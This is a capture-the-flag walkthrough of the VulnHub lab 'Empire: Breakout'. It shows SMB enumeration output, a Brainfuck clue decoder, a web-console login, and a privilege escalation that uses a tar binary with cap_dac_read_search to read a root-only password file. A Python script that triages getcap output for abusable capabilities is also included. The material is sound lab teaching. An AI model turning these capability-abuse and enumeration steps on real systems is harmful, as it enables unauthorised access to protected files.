- English name: Empire: Breakout
- Chinese name: Empire: Breakthrough
- Published date: October 21, 2021
- Difficulty: Easy
- Description: This box was created as a simple box, but it can be medium if you get lost. Hint: Discord server ( https://discord.gg/7asvAhCEhe )
- Download: https://www.vulnhub.com/entry/empire-breakout,751/
AILX10
Master's in Cybersecurity
1. Identify the target on the network; its IP address is 192.168.199.166.
2. Port scan: ports 80, 139, 445, 10000 and 20000 are open. Ports 10000 and 20000 both serve web login pages.
[Screenshots: open ports; the login pages on ports 10000 and 20000]
3. Open the home page on port 80 and view its HTML source; a Brainfuck program is hidden in it:
[Screenshots: home page and its source]
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
4. Decode the Brainfuck program (any online interpreter works) to get the clue: .2uqPEfj3D<P'a-3
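The decode above is easy to reproduce offline and to script for the next box. The following Python is an added example, not part of the original write-up: a small Brainfuck interpreter (bracket pre-matching, nested loops, byte wrap-around, no stdin) plus a regex that pulls a Brainfuck-looking run out of page source so the clue can be extracted without eyeballing the HTML. PROGRAM is a copy of the program from the page source; SAMPLE_HTML is constructed here as a stand-in for the real page and is not the box's actual markup.

```python
"""Added example: decode the Brainfuck clue hidden in the page source offline."""
from __future__ import annotations

import re

# Copy of the Brainfuck program from the home page source (split for readability).
PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]"
    ">>++++++++++++++++.++++."
    ">>+++++++++++++++++.----."
    "<++++++++++.-----------."
    ">-----------.++++."
    "<<+.>-.--------.++++++++++++++++++++."
    "<------------.>>---------."
    "<<++++++.++++++."
)

# Constructed stand-in for the real page source: the program sits in an HTML comment.
SAMPLE_HTML = "<html><body><h1>Breakout</h1></body></html>\n<!--\n" + PROGRAM + "\n-->\n"

# A run of 40+ Brainfuck opcodes is unlikely to occur by accident in ordinary HTML.
BF_RUN = re.compile(r"[+\-<>\[\].,]{40,}")


def find_brainfuck(text: str) -> list[str]:
    """Return every long run of Brainfuck opcodes found in text (e.g. page source)."""
    return BF_RUN.findall(text)


def run_brainfuck(program: str, tape_size: int = 30_000) -> str:
    """Execute program with no stdin and return its output decoded as Latin-1.

    Cells are unsigned bytes that wrap at 256, loops may nest, and every
    character outside the eight opcodes is ignored as a comment.
    """
    # Pre-match brackets so each jump is O(1) and unbalanced programs fail early.
    jumps, stack = {}, []
    for pc, op in enumerate(program):
        if op == "[":
            stack.append(pc)
        elif op == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {pc}")
            start = stack.pop()
            jumps[start], jumps[pc] = pc, start
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")

    tape = bytearray(tape_size)
    ptr = pc = 0
    out = bytearray()
    while pc < len(program):
        op = program[pc]
        if op == ">":
            ptr += 1
        elif op == "<":
            ptr -= 1
        elif op == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif op == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif op == ".":
            out.append(tape[ptr])
        elif op == ",":
            tape[ptr] = 0  # no input available: treat as EOF and store 0
        elif op == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif op == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        if not 0 <= ptr < tape_size:
            raise IndexError(f"tape pointer left the tape at offset {pc}")
        pc += 1
    return out.decode("latin-1")


def decode_page(html: str) -> list[str]:
    """Find and run every Brainfuck program embedded in a page's source."""
    return [run_brainfuck(p) for p in find_brainfuck(html)]


if __name__ == "__main__":
    for clue in decode_page(SAMPLE_HTML):
        print(clue)
```

Running it prints the same clue the online decoder gave. Feed `decode_page` the output of `curl -s http://192.168.199.166/` to skip the manual source inspection; the regex threshold of 40 opcodes keeps short accidental runs such as `<!-- ... -->` from being executed.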
5. Use enum4linux against port 445 (SMB) to enumerate users; it reveals the Unix user cyber:
enum4linux -a 192.168.199.166
[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''
S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cyber (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
6. Try the two clues gathered so far (the username cyber and the decoded string) on the web login pages; the login on port 20000 succeeds.
7. Click the shell icon in the lower left corner to get an interactive shell as cyber, and read the user flag (user.txt in cyber's home directory).
8. Inspect the tar binary in cyber's home directory: it is root-owned and carries the file capability CAP_DAC_READ_SEARCH, so it can read any file on the system.
CAP_DAC_READ_SEARCH: bypass file read permission checks and directory read and execute (search) permission checks.
[cyber@breakout ~]$ ls -hl tar
-rwxr-xr-x 1 root root 520K Oct 19 2021 tar
[cyber@breakout ~]$ getcap tar
tar cap_dac_read_search=ep
9. Use that tar to archive a root-only file and then extract the archive: tar -c reads /var/backups/.old_pass.bak through the capability, and tar -x writes the copy back out owned by cyber, so it can be read with cat. The file holds a saved password, which leads to the root flag.
[cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ ./tar -xvf ailx10.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ ls
ailx10.tar
tar
user.txt
var
[cyber@breakout ~]$ cat ./var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
That completes the box.
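Steps 8 and 9 generalise: on any Linux box, `getcap -r / 2>/dev/null` lists every binary with file capabilities, and the text after the path (here `cap_dac_read_search=ep`) says which capabilities are set and in which sets (e = effective, p = permitted, i = inheritable). The Python below is an added example, not from the write-up: it parses that output in both the newer `path caps=flags` and the older `path = caps+flags` spelling, and flags capabilities that let a non-root user read arbitrary files or escalate. SAMPLE_GETCAP is constructed; only the tar line mirrors the box, the other paths (ping, python3.9, /opt/legacy/backup) are hypothetical. The caveat it encodes is the one to check before copying the tar trick elsewhere: a capability that is permitted but not effective (`+p` without `e`) is not raised at exec, so a program like tar that never calls capset itself gets nothing from it.

```python
"""Added example: triage `getcap -r / 2>/dev/null` output for abusable file capabilities."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of getcap output. Only the tar line mirrors the box; the other
# paths are hypothetical. The last line uses the older libcap spelling "path = caps+flags".
SAMPLE_GETCAP = """\
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.9 cap_setuid,cap_net_bind_service=eip
/opt/legacy/backup = cap_dac_override+p
"""

# Capabilities that let a process read files it has no DAC rights to, or that are
# direct escalation primitives. A starting point for triage, not an exhaustive list.
READ_ANY_FILE = {"cap_dac_read_search", "cap_dac_override"}
ESCALATE = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
            "cap_sys_module", "cap_chown", "cap_fowner"}

# One cap_to_text clause: optional comma-separated names, an operator, then flags.
CLAUSE = re.compile(r"^(?P<caps>[a-z0-9_,]*)(?P<op>[=+-])(?P<flags>[eip]*)$")


def parse_cap_text(text: str) -> dict[str, set[str]]:
    """Turn 'cap_setuid,cap_net_raw=eip' or '= cap_chown+ep' into {cap: {flags}}.

    Flags: e = effective, p = permitted, i = inheritable. The name 'all' is kept
    as a literal key rather than expanded to every capability.
    """
    caps: dict[str, set[str]] = {}
    for token in text.split():
        m = CLAUSE.match(token)
        if not m:
            raise ValueError(f"cannot parse capability clause {token!r}")
        names = [n for n in m["caps"].split(",") if n]
        flags = set(m["flags"])
        if m["op"] == "=":
            if not names:  # bare '=' clears everything; '=ep' means all=ep
                caps.clear()
                if flags:
                    caps["all"] = flags
                continue
            for n in names:
                caps[n] = set(flags)
        elif m["op"] == "+":
            for n in names:
                caps.setdefault(n, set()).update(flags)
        else:
            for n in names:
                caps.setdefault(n, set()).difference_update(flags)
    return caps


def parse_getcap(output: str) -> list[tuple[str, dict[str, set[str]]]]:
    """Split getcap output into (path, caps) pairs. Assumes paths contain no spaces."""
    entries = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, _, text = line.partition(" ")
        entries.append((path, parse_cap_text(text)))
    return entries


@dataclass
class Finding:
    path: str
    cap: str
    effective: bool  # raised at exec; False means the program must raise it itself
    why: str


def triage(entries: list[tuple[str, dict[str, set[str]]]]) -> list[Finding]:
    """Report capabilities that are permitted on the file and worth abusing."""
    findings = []
    for path, caps in entries:
        for cap, flags in caps.items():
            if "p" not in flags:
                continue  # never permitted: the kernel will not grant it at all
            if cap in READ_ANY_FILE:
                why = "read any file regardless of permissions"
            elif cap in ESCALATE:
                why = "privilege escalation primitive"
            else:
                continue
            findings.append(Finding(path, cap, "e" in flags, why))
    return findings


if __name__ == "__main__":
    for f in triage(parse_getcap(SAMPLE_GETCAP)):
        mode = "effective at exec" if f.effective else "permitted only (program must raise it)"
        print(f"{f.path}: {f.cap} [{mode}] -> {f.why}")
```

Pipe the real output in with `getcap -r / 2>/dev/null | python3 triage.py` after swapping SAMPLE_GETCAP for `sys.stdin.read()`. The tar line comes out as effective and "read any file", which is exactly why the archive-then-extract trick in step 9 works; the hypothetical `/opt/legacy/backup` line is reported as permitted only, a reminder that `getcap` alone does not prove a binary will actually use what it has been given.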
Posted on 2022-08-20 22:43